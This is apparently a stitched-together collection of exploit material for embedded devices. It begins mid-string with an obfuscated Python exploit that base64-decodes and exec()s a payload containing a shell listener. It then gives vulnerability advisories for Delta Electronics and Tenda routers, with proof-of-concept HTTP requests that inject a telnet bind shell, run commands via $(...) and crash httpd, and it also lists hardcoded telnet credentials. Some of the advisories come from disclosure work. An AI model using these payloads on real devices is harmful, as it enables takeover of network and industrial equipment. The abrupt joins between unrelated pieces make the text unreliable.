"6DQogICAgICAgIGtvbmFjID0gdGhyZWFkaW5nLlRoc"+        "mV"importer += "hZChuYW1lPSJaU0wiLCB0YXJnZXQ9c2VsZi50aGVfZW"+        "F"importer += "yKQ0KICAgICAgICBrb25hYy5zdGFydCgpDQogICAgIC"+        "A"importer += "gIHNsZWVwKDEpDQogICAgICAgIHNlbGYudGhlX3VwbG"+        "9"importer += "hZCgpDQoNCiAgICBkZWYgdGhlX2VhcihzZWxmKToNC"+        "iA"importer += "gICAgICAgdGVsbmV0dXMgPSB0ZWxuZXRsaWIuVGVs"+        "bmV"importer += "0KCkNCiAgICAgICAgcHJpbnQoIlN0YXJ0aW5nIGh"+        "hbmR"importer += "sZXIgb24gcG9ydCB7fS4iLmZvcm1hdChzZWxmLm"+        "xwb3J"importer += "0KSkNCiAgICAgICAgcyA9IHNvY2tldC5zb2NrZ"+        "XQoc29"importer += "ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NU"+        "UkVBTSk"importer += "NCiAgICAgICAgcy5iaW5kKCgiMC4wLjAuMCI"+        "sIHNlbGY"importer += "ubHBvcnQpKQ0KICAgICAgICB3aGlsZSBUcn"+        "VlOg0KICA"importer += "gICAgICAgICAgdHJ5Og0KICAgICAgICAgI"+        "CAgICAgIHM"importer += "uc2V0dGltZW91dCg3KQ0KICAgICAgICAg"+        "ICAgICAgIHM"importer += "ubGlzdGVuKDEpDQogICAgICAgICAgICA"+        "gICAgY29ubiw"importer += "gYWRkciA9IHMuYWNjZXB0KCkNCiAgIC"+        "AgICAgICAgICA"importer += "gICBwcmludCgiQ29ubmVjdGlvbiBmc"+        "m9tIHt9Ont9Ii5"importer += "mb3JtYXQoYWRkclswXSwgYWRkclsx"+        "XSkpDQogICAgICA"importer += "gICAgICAgICAgdGVsbmV0dXMuc29"+        "jayA9IGNvbm4NCiA"importer += "gICAgICAgICAgIGV4Y2VwdCBzb2"+        "NrZXQudGltZW91dCB"importer += "hcyBwOg0KICAgICAgICAgICAgI"+        "CAgIHByaW50KCJIbW1"importer += "tICh7bXNnfSkiLmZvcm1hdCht"+        "c2c9cCkpDQogICAgICA"importer += "gICAgICAgICAgcy5jbG9zZSg"+        "pDQogICAgICAgICAgICA"importer += "gICAgZXhpdCgwKQ0KICAgIC"+        "AgICAgICAgYnJlYWsNCg0"importer += "KICAgICAgICBwcmludCgiW"+        "W91IGdvdCBzaGVsbC4iKQ0"importer += "KICAgICAgICB0ZWxuZXR1"+        "cy5pbnRlcmFjdCgpDQogICA"importer += "gICAgIGNvbm4uY2xvc2U"+        "oKQ0KDQogICAgZGVmIG1haW4"importer += "oc2VsZik6DQogICAgIC"+        "AgIHNlbGYudGhlX2FyZ3MoKQ0"importer += "KICAgICAgICBzZWxmL"+        "nRoZV9zdWJwKCkNCg0KaWYgX19"importer += "uYW1lX18gPT0gJ19f"+        "bWFpbl9fJzoNCiAgICBWaWRlb0t"importer += "pbGxlZFRoZVJhZGl"+        "vU3RhcigpLm1haW4oKQ0K"######"retropmi  = "U2VjdXJpdHkgaXM"+        "gbGlrZSBhbiBvbmlvbjogdGhlIG1v"retropmi += "cmUgbGF5ZXJzIH"+        "lvdSBwZWVsLCB0aGUgbW9yZSBpdCBz"retropmi += "dGlua3Mu"####"+        "###############################"radio_code = base64.b64decode(importer)curves = [ord(c) for c in retropmi]maxi = max(curves)mini = min(curves)code_range = maxi - minijcoords = [int(20 * (1 - (codeio - mini) / code_range)) for codeio in curves]for y in range(20, 0, -1):    line = ""    for x in range(len(jcoords)):        if jcoords[x] >= y:            line += "-"        else:            line += " "    print(line)    time.sleep(0.03/1.337)exec(radio_code)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x upload.cgi Code Execution

Delta Electronics DVW-W02W2-E2 1.5.0.10 is vulnerable to Command Injection via Crafted URL.

**Title**: Authenticated Command Injection  
**Product**: Delta Electronics DVW-W02W2-E2  
**Vulnerable version**: V2.42  
**Fixed version**: V2.5.2  
**CVE**: CVE-2022-42139  
**Impact**: High  
**Homepage**: https://www.deltaww.com  
**Found**: 2022-08-01

_Delta Electronics DVW-W02W2-E2 is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device._

**Vendor description**

“Delta, founded in 1971, is a global provider of power and thermal management solutions. Its mission statement, “To provide innovative, clean and energy -efficient solutions for a better tomorrow,” focuses on addressing key environmental issues such as global climate change. As an energy-saving solutions provider with core competencies in power electronics and automation, Delta’s business categories include Power Electronics, Automation, and Infrastructure.”

Source: https://www.deltaww.com/en-US/about/aboutProfile

**Vulnerable versions****Vulnerability overview**

1) Authenticated Command Injection  
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

**Proof of Concept****1) Authenticated Command Injection**

The web server is prone to an authenticated command injection via POST parameters. This is only possible if the “timestamp” parameter is set correctly in the URL. The following proof-of-concept shows how to open a port binding shell on port 8889 with a “utelnetd” listener:

POST /apply.cgi?/MT\_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1  
Host: 192.168.3.148  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 105  
Origin: http://192.168.3.148  
Connection: close  
Referer: http://192.168.3.148/MT\_ping.htm  
Cookie: xxid=1973719449  
Upgrade-Insecure-Requests: 1

submit\_flag=mt\_ping&hid\_ver1=&hid\_ser1=&hid\_comm1=&hid\_ver2=&hid\_ser2=&hid\_comm2=&destination=\`utelnetd%20-p%208889%20-l%20/bin/ash%20-d\`

For accessing the device, the command “netcat” can be used:

$ nc 192.168.3.150 8889  
����!����

BusyBox v1.4.2 (2016-08-18 22:45:41 EDT) Built-in shell (ash)  
Enter ‘help’ for a list of built-in commands.

/ #

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

**Solution**

Update to firmware version V2.5.2.

**Workaround****Recommendation**

CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available.

**References****Contact Timeline**

*   2022-08-02: Contacting Delta Electronics.
*   2022-08-10: Vendor requested the advisory without encryption; Sent advisory to Delta Electronics.
*   2022-08-16: Security contact asked few questions regarding responsible disclosure; Sent answers.
*   2022-08-30: Asked for an update.
*   2022-09-01: Vendor responded, that they will need more time to resolve the issues; Provided additional 30 days (until 2022-11-02) for patching.
*   2022-10-11: Asked for an update.
*   2022-10-12: Vendor responded, that fixing will be done 2022-11-15; Shifted release date to this date.
*   2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted advisory release date to the same day.
*   2022-10-17: Asked for an update regarding the release; No answer.
*   2022-10-18: Asked for an update and shifted release date to 2022-10-22.
*   2022-10-19: Vendor responded, that there were problems at releasing the patch. Contact stated, that the patch will delay until end of November.
*   2022-10-21: Asked vendor for a concrete release date; No answer.
*   2022-10-28: Announced advisory release date for 2022-10-30 to vendor.
*   2022-10-29: Found firmware patches with issue date 2022-11-25 on vendors website.
*   2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory.

**Author**

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

CVE-2022-42139: [EN] Authenticated Command Injection in Delta Electronics DVW-W02W2-E2 - CyberDanube

Tenda W20E V16.01.0.6(3392) is vulnerable to Command injection via cmd_get_ping_output.

**Tenda W20E Command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is a Command injection vulnerability in tenda W20E V16.01.0.6(3392), which can execute arbitrary command in route system.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function do\_ping\_action:

The program passes the contents obtained by the hostName parameter to hostname.  
There is some filtering of parameters is judged by if, but we can bypass it, which is explained in the next section.  
Then, copy the content of hostname through the strncpy function into cfg.hostname.  
And cfg is called by function cmd\_get\_ping\_output().  
In function cmd\_get\_ping\_output：

Then, format the matching content of cfg.hostname through the snprintf function into new\_cmd\_buf.  
The new\_cmd\_buf is called by popen().  
There is a command injection vulnerability.  
The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack. In the judgment of If, you can see that the characters(; | &) are filtered, and if these characters are included, code will goto fail. But we can use '$' to do Command injection.  
 The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668695093889 HTTP/1.1
Host: 192.168.0.1
Content-Length: 87
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=70ebc4f9c9d22827a5874d1bb6f06abddwdvmy; bLanguage=cn; sessionid=W20Ev5:0.167.3:6b0846
Connection: close

{"setFixTools":{"networkTool":1,"hostName":"test$(touch /tmp/test0)","packageSize":32}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

Figure shows POC attack effect, the file test0 is created.

**CVE-ID**

unsigned

CVE-2022-45996: public_bug/tenda/w20e/2 at main · bugfinder0/public_bug

Tenda W20E V16.01.0.6(3392) is vulnerable to Buffer Overflow.

**Tenda W20E Buffer overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is an buffer overflow vulnerability in tenda W20E V16.01.0.6(3392), which can cause httpd to crash and restart.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function formSetPortMirror, the corresponding function field is setPortMirror.

In function formSetPortMirror:

The program passes the contents obtained by the portMirrorMirroredPorts parameter to pMirroredPorts.  
Then, format the matching content of pMirroredPorts through the sprintf function into sMibValue.  
There is no size check, so there is a vulnerability that can cause buffer overflow through portMirrorMirroredPorts field.

The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack.

The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668753675738 HTTP/1.1
Host: 192.168.0.1
Content-Length: 95
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: curShow=; bLanguage=cn; sessionid=W20Ev5:0.133.2:f012ed
Connection: close

{"setPortMirror":{"portMirrorEn":true,"portMirrorLanPort":4,"portMirrorMirroredPorts":"1,0,0a\*200"}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

And attack twice:

Figure shows POC attack effect, the binary httpd restarts, because the process id changed.

**CVE-ID**

unsigned

Tag

#telnet